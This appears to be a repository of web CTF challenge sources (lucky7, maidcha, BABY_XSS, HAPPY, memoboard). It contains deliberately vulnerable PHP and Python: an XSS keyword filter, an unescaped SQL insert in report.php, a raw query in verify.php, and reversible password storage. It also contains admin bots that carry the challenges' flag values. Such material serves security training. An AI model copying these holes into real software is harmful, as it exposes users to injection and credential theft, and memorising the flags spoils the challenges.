') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/HSPACE_CTF/lucky7/index.php: -------------------------------------------------------------------------------- 1 | '\"\s])/", null, $_GET['jscode']) : 'print()'; 13 | if(strlen($jscode) > 7*7*7) $jscode = 'print()'; 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 | Lucky7 21 | 22 | 23 |

Lucky7

24 | 25 | If you can steal `flag` variable, please send a payload here.
26 | source 27 |
28 |
29 | 33 | 34 | 35 |
36 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/lucky7/lucky.php: -------------------------------------------------------------------------------- 1 | ]{8}'; // max length is 7, alert(1) -> dead 11 | $common = '[$&#;]|flag|name|eval|script|frame|on.{5}'; // common filter keywords 12 | if(preg_match("/{$seven}|{$common}/is", $jscode)) $jscode = 'print()'; 13 | 14 | if($action == 'run') 15 | echo ''; 16 | if($action == 'show') 17 | echo $jscode; 18 | ?> 19 | source -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /[CENSORED] 4 | RUN mkdir /memo 5 | 6 | COPY ./src /[CENSORED] 7 | COPY ./memo /memo 8 | 9 | RUN chmod 777 -R /[CENSORED] 10 | RUN chmod 777 -R /memo 11 | 12 | COPY ./flag /[CENSORED]/flag 13 | 14 | RUN pip install -r /[CENSORED]/requirements.txt 15 | 16 | EXPOSE 8080 17 | ENTRYPOINT ["python"] 18 | CMD ["/[CENSORED]/app.py"] -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/flag: -------------------------------------------------------------------------------- 1 | hspace{fake-flag} -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/memo/1: -------------------------------------------------------------------------------- 1 | Hello, I'm a maid cha. 2 | I'm sleepy. 
-------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/memo/2: -------------------------------------------------------------------------------- 1 | Enjoy it, super easy :) -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | maidcha 7 | 8 | 9 |

maidcha

10 | 1
11 | 2 12 | 13 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | urllib3==1.26.7 5 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 |
def normal_response(content, content_type='text/plain') -> str:
    """Build a complete ``HTTP/1.1 200 OK`` response as one CRLF-joined string.

    The response carries Content-Length, Content-Type and ``Connection: close``
    headers, an empty line, and ``str(content)`` as the body.

    Args:
        content: Body to send; it is measured with ``len()`` and emitted
            through ``str()``.
        content_type: Value for the Content-Type header; ``None`` falls back
            to ``'text/plain'``.

    Returns:
        The response text, with lines separated by CRLF.
    """
    if content_type == None:
        content_type = 'text/plain'

    res = []
    res.append('HTTP/1.1 200 OK')
    # NOTE(review): Content-Length counts len(content), but the body sent is
    # str(content). The two agree only for text whose encoded form has one byte
    # per character; for bytes input str() yields the b'...' repr, and a
    # multi-byte character makes the declared length shorter than the body.
    # Measuring the encoded body, with the encoding the caller actually sends,
    # keeps the header and the body consistent.
    res.append(f"Content-Length: {len(content)}")
    # NOTE(review): content_type is written into the header line unchanged. The
    # caller is not visible here; if the value can come from request data, reject
    # CR/LF in it before this point so it cannot add header lines.
    res.append(f"Content-Type: {content_type}")
    res.append('Connection: close')
    res.append('')
    res.append(str(content))

    res = '\r\n'.join(res)
    return res
-------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/bot/bot.py: --------------------------------------------------------------------------------
# Polling loop for the challenge's admin bot: asks onlybot.php for the next
# reported URL and, when the reply is not '0', opens that URL in Chrome with the
# FLAG cookie set for the challenge origin.
# NOTE(review): the page shows this file without indentation. The nesting below
# (the `else` paired with the `if`, the final print inside the loop) is the
# reading that matches the line order; confirm against the repository.
from selenium import webdriver
import requests
import time

while True:
    r = requests.get("http://sunrin.kiminfo.kr:18625/onlybot.php")
    if r.text != '0':
        driver = webdriver.Chrome('./chromedriver.exe')
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)

        # The site is loaded first because add_cookie() applies to the domain of
        # the page that is currently open.
        # NOTE(review): these two calls sit outside the try block, so an
        # exception here ends the loop and leaves the browser process running;
        # a try/finally around the whole visit would always reach quit().
        driver.get("http://sunrin.kiminfo.kr:18625/")
        # Only name and value are given, so the cookie carries no httpOnly or
        # secure attribute; presumably deliberate for an XSS challenge.
        driver.add_cookie({"name": "FLAG", "value": "SUNRIN{tr1cky_xS5_9AME_lO1}"})
        try:
            # NOTE(review): the reply body is passed to the browser as received,
            # with no scheme or host check in this file. Whatever validation
            # report.php performs is not visible on this page; accepting only
            # http/https URLs here, before a browser is started, keeps the bot
            # from opening local or browser-internal URLs.
            driver.get(r.text)
            print(r.text)
            time.sleep(3)
            driver.quit()
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit and hides the reason a visit failed.
        except:
            driver.quit()
    else:
        time.sleep(5)

    print("It's working.", flush=True)
-------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/index.php: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |

Sunrin XSS Sanitizer 1.0

17 | Can you bypass my sanitizer? Really?
18 | If you find a vulnerability, please report it here.
19 | 20 |
21 | 22 | 23 | 24 |
25 |

26 | 27 | 33 | 34 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/init.sql: -------------------------------------------------------------------------------- 1 | SET NAMES utf8mb4; 2 | 3 | CREATE TABLE `urls` ( 4 | `no` int(11) NOT NULL AUTO_INCREMENT, 5 | `url` varchar(4096) DEFAULT NULL, 6 | `is_read` int(1) DEFAULT 0, 7 | PRIMARY KEY (`no`) 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/onlybot.php: -------------------------------------------------------------------------------- 1 | query("SELECT * FROM urls WHERE is_read=0"); 6 | $fetch = $result->fetch_array(MYSQLI_ASSOC); 7 | 8 | if($fetch){ 9 | $db->query("UPDATE urls SET is_read=1 WHERE no={$fetch['no']}"); 10 | echo $fetch['url']; 11 | } else { 12 | echo '0'; 13 | } 14 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/report.php: -------------------------------------------------------------------------------- 1 | query("INSERT INTO urls VALUES (NULL, '{$url}', 0)"); 8 | echo ''; 9 | } 10 | else { 11 | echo ''; 12 | } 13 | } 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 |

send us your url, admin will check it soon :)

21 |
22 | 23 | 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/bot/bot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | import requests 3 | import time 4 | 5 | while True: 6 | r = requests.get("http://sunrin.kiminfo.kr:18777/onlybot.php") 7 | if r.text != '0': 8 | driver = webdriver.Chrome('./chromedriver.exe') 9 | driver.implicitly_wait(3) 10 | driver.set_page_load_timeout(3) 11 | 12 | driver.get("http://sunrin.kiminfo.kr:18777/") 13 | driver.add_cookie({"name": "FLAG", "value": "SUNRIN{rp0rpOrpOrpOzZrp0rprOprOp}"}) 14 | try: 15 | driver.get(r.text) 16 | print(r.text) 17 | time.sleep(3) 18 | driver.quit() 19 | except: 20 | driver.quit() 21 | else: 22 | time.sleep(5) 23 | 24 | print("It's working. (RPO)", flush=True) 25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/config.js: -------------------------------------------------------------------------------- 1 | /* default values config */ 2 | let name = "admin"; 3 | let msg = "Can you get what you want?"; -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | If you find a vulnerability, please report it here. 10 |
11 | 12 | 13 | 14 |
15 |
16 | 30 | 31 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/init.sql: -------------------------------------------------------------------------------- 1 | SET NAMES utf8mb4; 2 | 3 | CREATE TABLE `urls` ( 4 | `no` int(11) NOT NULL AUTO_INCREMENT, 5 | `url` varchar(4096) DEFAULT NULL, 6 | `is_read` int(1) DEFAULT 0, 7 | PRIMARY KEY (`no`) 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/onlybot.php: -------------------------------------------------------------------------------- 1 | query("SELECT * FROM urls WHERE is_read=0"); 6 | $fetch = $result->fetch_array(MYSQLI_ASSOC); 7 | 8 | if($fetch){ 9 | $db->query("UPDATE urls SET is_read=1 WHERE no={$fetch['no']}"); 10 | echo $fetch['url']; 11 | } else { 12 | echo '0'; 13 | } 14 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/report.php: -------------------------------------------------------------------------------- 1 | query("INSERT INTO urls VALUES (NULL, '{$url}', 0)"); 8 | echo ''; 9 | } 10 | else { 11 | echo ''; 12 | } 13 | } 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 |

send us your url, admin will check it soon :)

21 |
22 | 23 | 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/writeup/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/LOGIN_MASTER/config.php: -------------------------------------------------------------------------------- 1 | prepare("INSERT INTO posts (title, content, author, iv) VALUES (:t, :c, :a, :iv)"); 11 | $stmt->bindValue(':t', $_POST['title'], SQLITE3_TEXT); 12 | 13 | $encryptedData = encryptAES($_POST['content']); 14 | $stmt->bindValue(':c', $encryptedData['ciphertext'], SQLITE3_TEXT); 15 | $stmt->bindValue(':iv', $encryptedData['iv'], SQLITE3_TEXT); 16 | $stmt->bindValue(':a', $_SESSION['username'], SQLITE3_TEXT); 17 | 18 | $stmt->execute(); 19 | } 20 | $stmt = $db->prepare("SELECT title, content, iv FROM posts WHERE author = :a ORDER BY id DESC"); 21 | $stmt->bindValue(':a', $_SESSION['username'], SQLITE3_TEXT); 22 | $rows = $stmt->execute(); 23 | ?> 24 | 25 | 26 | 27 | 28 | Board 29 | 30 | 31 | 32 |
33 |

Board

34 |
35 |
36 |
37 | 38 |
39 |
40 | fetchArray(SQLITE3_ASSOC)): ?> 41 |

42 | 45 |

46 |
47 | 48 |

Go Main

49 |
50 | 51 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/db.php: -------------------------------------------------------------------------------- 1 | exec(" 6 | CREATE TABLE IF NOT EXISTS users ( 7 | id INTEGER PRIMARY KEY AUTOINCREMENT, 8 | username TEXT UNIQUE, 9 | password TEXT, 10 | iv TEXT 11 | ); 12 | "); 13 | 14 | $db->exec(" 15 | CREATE TABLE IF NOT EXISTS posts ( 16 | id INTEGER PRIMARY KEY AUTOINCREMENT, 17 | title TEXT, 18 | content TEXT, 19 | author TEXT, 20 | iv TEXT 21 | ); 22 | "); 23 | 24 | $db->exec(" 25 | CREATE TABLE IF NOT EXISTS twofa ( 26 | id INTEGER PRIMARY KEY AUTOINCREMENT, 27 | username TEXT UNIQUE, 28 | twofa_enabled INTEGER DEFAULT 0, 29 | twofa_secret TEXT 30 | ); 31 | "); 32 | 33 | $db->exec(" 34 | CREATE TABLE IF NOT EXISTS tokens ( 35 | token TEXT UNIQUE 36 | ); 37 | "); 38 |
/**
 * Encrypt a string with AES-256-CBC under the key defined inside this function.
 *
 * A new IV of the cipher's IV length is drawn for every call and returned with
 * the ciphertext; both values are base64-encoded.
 *
 * NOTE(review): the key is a literal in the source file (this published copy
 * shows what looks like a placeholder value). A deployment should load the key
 * from configuration kept outside the repository.
 * NOTE(review): CBC is used without a MAC, so decryptAES() has no way to detect
 * a ciphertext or IV that was changed in storage; an AEAD mode such as
 * aes-256-gcm, or encrypt-then-MAC, adds that check.
 * NOTE(review): on this page register.php stores account passwords through
 * this function and login.php compares the decrypted value, so every stored
 * password is recoverable by whoever holds the key; password_hash() and
 * password_verify() give one-way storage instead.
 *
 * @param string $plain Text to encrypt.
 * @return array{ciphertext: string, iv: string} Base64-encoded ciphertext and IV.
 */
function encryptAES($plain) {
    $key = 'dummydummydummydummydummydummydu';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc'));
    // openssl_encrypt() returns false on failure; base64_encode(false) below
    // then yields an empty string, which the caller cannot tell from a result.
    $encrypted = openssl_encrypt($plain, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);
    return [
        'ciphertext' => base64_encode($encrypted),
        'iv' => base64_encode($iv)
    ];
}
/**
 * Reverse encryptAES(): base64-decode the ciphertext and the IV, then decrypt
 * with AES-256-CBC under the same in-source key.
 *
 * @param string $ciphertext Base64-encoded ciphertext.
 * @param string $iv         Base64-encoded IV.
 * @return string|false Decrypted text, or false when openssl_decrypt() fails
 *                      (for example on bad padding).
 */
function decryptAES($ciphertext, $iv) {
    $key = 'dummydummydummydummydummydummydu';
    // Non-strict base64_decode(): characters outside the base64 alphabet are
    // skipped rather than rejected.
    $decodedCiphertext = base64_decode($ciphertext);
    $decodedIV = base64_decode($iv);
    return openssl_decrypt($decodedCiphertext, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $decodedIV);
}
-------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/index.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 | Main 10 | 11 | 30 | 31 | 32 |
33 | 34 |

Memo board

35 |

Welcome to our service! Please log in or register to enjoy all features.

36 |

37 | Login | 38 | Register 39 |

40 |
41 |

Quick Links:

42 |
    43 |
  • Experience a secure memo board with 2FA.
  • 44 |
  • Enjoy a variety of features for free.
  • 45 |
  • Log out securely when you're done.
  • 46 |
47 |
48 | 49 |

Hello,

50 |

Welcome back! Explore the features available to you.

51 |

52 | Board | 53 | My Page | 54 | Logout 55 |

56 |
57 |

Quick Links:

58 |
    59 |
  • Experience a secure memo board with 2FA.
  • 60 |
  • Enjoy a variety of features for free.
  • 61 |
  • Log out securely when you're done.
  • 62 |
63 |
64 | 65 |
66 | 67 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/login.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM users WHERE username = :u"); 14 | $stmt->bindValue(':u', $username, SQLITE3_TEXT); 15 | $res = $stmt->execute(); 16 | $user = $res->fetchArray(SQLITE3_ASSOC); 17 | 18 | if ($user) { 19 | $decryptedPassword = decryptAES($user['password'], $user['iv']); 20 | if ($decryptedPassword === $password) { 21 | $twofaStmt = $db->prepare("SELECT twofa_enabled FROM twofa WHERE username = :u"); 22 | $twofaStmt->bindValue(':u', $username, SQLITE3_TEXT); 23 | $twofaRes = $twofaStmt->execute(); 24 | $twofaData = $twofaRes->fetchArray(SQLITE3_ASSOC); 25 | 26 | if ($twofaData && $twofaData['twofa_enabled']) { 27 | $_SESSION['temp_username'] = $username; 28 | $_SESSION['temp_password'] = $password; 29 | header('Location: 2fa.php'); 30 | exit; 31 | } else { 32 | $_SESSION['username'] = $username; 33 | header('Location: index.php'); 34 | exit; 35 | } 36 | } else { 37 | $msg = 'Invalid username or password.'; 38 | } 39 | } else { 40 | $msg = 'Invalid username or password.'; 41 | } 42 | } 43 | } 44 | ?> 45 | 46 | 47 | 48 | 49 | Login 50 | 51 | 52 | 53 |
54 |

Login

55 | 56 |

57 | 58 |
59 |
60 |
61 |
62 | 63 | 64 |
65 |
66 |
67 | 68 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/logout.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM twofa WHERE username=:u"); 9 | $stmt->bindValue(':u', $_SESSION['username'], SQLITE3_TEXT); 10 | $res = $stmt->execute(); 11 | $user = $res->fetchArray(SQLITE3_ASSOC); 12 | 13 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 14 | if (isset($_POST['enable2fa']) && $user['twofa_enabled'] == 0) { 15 | $secret = generateRandomSecret(); 16 | $upd = $db->prepare("UPDATE twofa SET twofa_enabled=1, twofa_secret=:s WHERE username=:u"); 17 | $upd->bindValue(':s', $secret, SQLITE3_TEXT); 18 | $upd->bindValue(':u', $_SESSION['username'], SQLITE3_TEXT); 19 | $upd->execute(); 20 | $msg = '2FA Enabled'; 21 | $user['twofa_enabled'] = 1; 22 | $user['twofa_secret'] = $secret; 23 | } 24 | } 25 | function generateRandomSecret($length = 16) { 26 | $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'; 27 | return implode('', array_map(fn() => $alphabet[random_int(0, strlen($alphabet) - 1)], range(1, $length))); 28 | } 29 | ?> 30 | 31 | 32 | 33 | 34 | My Page 35 | 36 | 37 | 38 |
39 |

My Page

40 | 41 |
42 | 43 |
44 | 45 |

46 | 2FA is Enabled.
47 | Secret:

48 | Please install Google Authenticator and add this secret code to register. 49 |

50 | 51 |

Go Main

52 |
53 | 54 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/register.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT 1 FROM users WHERE username = :u"); 11 | $checkStmt->bindValue(':u', $username, SQLITE3_TEXT); 12 | $result = $checkStmt->execute(); 13 | $row = $result->fetchArray(SQLITE3_ASSOC); 14 | 15 | if ($row) { 16 | $msg = 'Username already exists!'; 17 | } else { 18 | $passwordData = encryptAES($password); 19 | $stmt = $db->prepare("INSERT INTO users (username, password, iv) VALUES (:u, :p, :iv)"); 20 | $stmt->bindValue(':u', $username, SQLITE3_TEXT); 21 | $stmt->bindValue(':p', $passwordData['ciphertext'], SQLITE3_TEXT); 22 | $stmt->bindValue(':iv', $passwordData['iv'], SQLITE3_TEXT); 23 | 24 | $twofaStmt = $db->prepare("INSERT INTO twofa (username) VALUES (:u)"); 25 | $twofaStmt->bindValue(':u', $username, SQLITE3_TEXT); 26 | try { 27 | $stmt->execute(); 28 | $twofaStmt->execute(); 29 | header('Location: login.php'); 30 | exit; 31 | } catch (Exception $e) { 32 | $msg = 'An error occurred during registration.'; 33 | } 34 | } 35 | } 36 | ?> 37 | 38 | 39 | 40 | 41 | Register 42 | 43 | 44 | 45 |
46 |

Register

47 | 48 |

49 | 50 |
51 |
52 |
53 |
54 | 55 | 56 |
57 |
58 |
59 | 60 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f4f4f9; 4 | color: #333; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | margin: 0; 10 | } 11 | 12 | .container { 13 | background-color: #fff; 14 | padding: 20px; 15 | border-radius: 8px; 16 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 17 | width: 400px; 18 | text-align: center; 19 | } 20 | 21 | input[type="text"], input[type="password"], textarea { 22 | padding: 10px; 23 | margin: 10px 0; 24 | border: 1px solid #ddd; 25 | border-radius: 4px; 26 | } 27 | 28 | button { 29 | background-color: #007bff; 30 | color: #fff; 31 | border: none; 32 | padding: 10px 20px; 33 | border-radius: 4px; 34 | cursor: pointer; 35 | transition: background-color 0.3s; 36 | } 37 | 38 | button:hover { 39 | background-color: #0056b3; 40 | } 41 | 42 | h1 { 43 | margin-bottom: 20px; 44 | } 45 | 46 | p { 47 | margin: 10px 0; 48 | } 49 | 50 | form { 51 | margin-bottom: 20px; 52 | } -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/verify.php: -------------------------------------------------------------------------------- 1 | query($query); 17 | $user = $res->fetchArray(SQLITE3_ASSOC); 18 | 19 | if ($user) { 20 | $decryptedPassword = decryptAES($user['password'], $user['iv']); 21 | if ($decryptedPassword === $password) { 22 | $twofaStmt = $db->prepare("SELECT twofa_enabled FROM twofa WHERE username = :u"); 23 | $twofaStmt->bindValue(':u', $user['username'], SQLITE3_TEXT); 24 | $twofaRes = $twofaStmt->execute(); 25 | $twofaData = $twofaRes->fetchArray(SQLITE3_ASSOC); 26 | 27 | if ($twofaData && $twofaData['twofa_enabled']) { 28 | $stmt = $db->prepare("SELECT * FROM tokens WHERE token = :t"); 29 | 
$stmt->bindValue(':t', $token, SQLITE3_TEXT); 30 | $res = $stmt->execute(); 31 | $tokenRow = $res->fetchArray(SQLITE3_ASSOC); 32 | 33 | if ($tokenRow) { 34 | $stmt = $db->prepare("DELETE FROM tokens WHERE token = :t"); 35 | $stmt->bindValue(':t', $token, SQLITE3_TEXT); 36 | $stmt->execute(); 37 | 38 | $_SESSION['username'] = $user['username']; 39 | header('Location: index.php'); 40 | exit; 41 | } else { 42 | $msg = 'Invalid token.'; 43 | } 44 | } 45 | } else { 46 | $msg = 'Invalid username or password.'; 47 | } 48 | } else { 49 | $msg = 'Invalid username or password.'; 50 | } 51 | } 52 | ?> 53 | 54 | 55 | 56 | 57 | Verify 58 | 59 | 60 | 61 |
62 |

Verify Login

63 | 64 |

65 | 66 |
67 | 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My CTF Challenges (99.98% Web Challenge) 2 | A collection of web challenges I made. 3 | 4 | ### 2017 5 | 6 | |CTF|Name|Concept| 7 | |---|---|---| 8 | | Belluminar CTF | Color world | XXE, XSLT Injection to RCE | 9 | | Layer7 CTF | daniel's daily life | BBCode XSS | 10 | | Layer7 CTF | Can you bypass me? | Bypass regexp, Eval function | 11 | | Power Of XX CTF | Basic web | SQL Injection | 12 | | Power Of XX CTF | SQL game | SQL Injection | 13 | | - | Can you do it? | SQL Injection | 14 | | - | Dirt-Y | MISC, PHP game | 15 | | - | Is this possible? | SQL Injection | 16 | | - | Simple Login | SQL Injection | 17 | 18 | ### 2018 19 | 20 | |CTF|Name|Concept| 21 | |---|---|---| 22 | | H3X0R CTF | SQL game revenge | SQL Injection | 23 | | H3X0R CTF | Goodaegi board | SQL Injection | 24 | | Sunrin Hacking Festival | Click the button | MISC, Coding | 25 | | Sunrin Hacking Festival | Pretty board | SQL Injection | 26 | | Sunrin Hacking Festival | Simple login | SQL Injection | 27 | | Sunrin Hacking Festival | Simple login revenge | LFI to RCE | 28 | | Layer7 CTF | Margaret | RCE via PHP Session | 29 | | Hackingcamp18 CTF | Pretty Shop | Indirect SQLite Injection | 30 | | - | Count | Race condition in php file function | 31 | 32 | ### 2019 33 | 34 | |CTF|Name|Concept| 35 | |---|---|---| 36 | | Christmas CTF | Dynamic SQL | PHP, SQL Injection | 37 | | Belluminar CTF | - | - | 38 | | Sunrin Internet High School CTF | jjang9 | PHP, Bypass open_basedir, LFI to RCE | 39 | | Sunrin Internet High School CTF | My first app | Flask, Blind CSS Injection | 40 | | Sunrin Internet High School CTF | Last old school | PHP, Error based SQL Injection | 41 | | - | rename | PHP filesystem bug | 42 | 43 | ### 2021 44 | 45 | |CTF|Name|Concept| 46 | |---|---|---| 47 | | LAYER7 CTF | handmade | Python, Path 
Traversal | 48 | | LAYER7 CTF | selfmade | Python, Logic Bug | 49 | 50 | ### 2022 51 | 52 | |CTF|Name|Concept| 53 | |---|---|---| 54 | | Best of the Best CTF(Web) | - | DOM Clobbering, XSS | 55 | | Best of the Best CTF(Web) | - | Prototype Pollution, XSS | 56 | | Best of the Best CTF(Web) | - | Relative Path Overwrite, XSS | 57 | | SUNRIN CTF | BABY XSS | XSS | 58 | | SUNRIN CTF | HAPPY | XSS | 59 | | SUNRIN CTF | LOGIN MASTER | SQLite3, SQL Injection | 60 | | HSPACE CTF | maidcha | Python, Logic Bug | 61 | | HSPACE CTF | hspace proxy | Python, SSRF, SQL Injection | 62 | | HSPACE CTF | lucky7 | XSS | 63 | --------------------------------------------------------------------------------